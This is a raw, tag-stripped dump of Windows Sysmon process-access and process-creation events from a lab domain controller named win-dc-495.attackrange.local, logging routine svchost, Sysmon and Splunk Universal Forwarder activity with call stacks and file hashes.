cb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:44.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:44.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:44.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:44.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:44.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:44.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:44.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:44.611{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-92E8-6005-C204-00000000A301}216C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:44.611{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92E8-6005-C204-00000000A301}216C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:44.612{59A5CD1D-92E8-6005-C204-00000000A301}216C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:45.658{59A5CD1D-92E9-6005-C304-00000000A301}48321420C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:45.517{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92E9-6005-C304-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:45.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:45.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:45.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:45.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:45.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:45.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:45.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:45.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:45.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:45.517{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-92E9-6005-C304-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:45.517{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92E9-6005-C304-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:45.518{59A5CD1D-92E9-6005-C304-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:46.064{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92EA-6005-C404-00000000A301}3416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:46.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 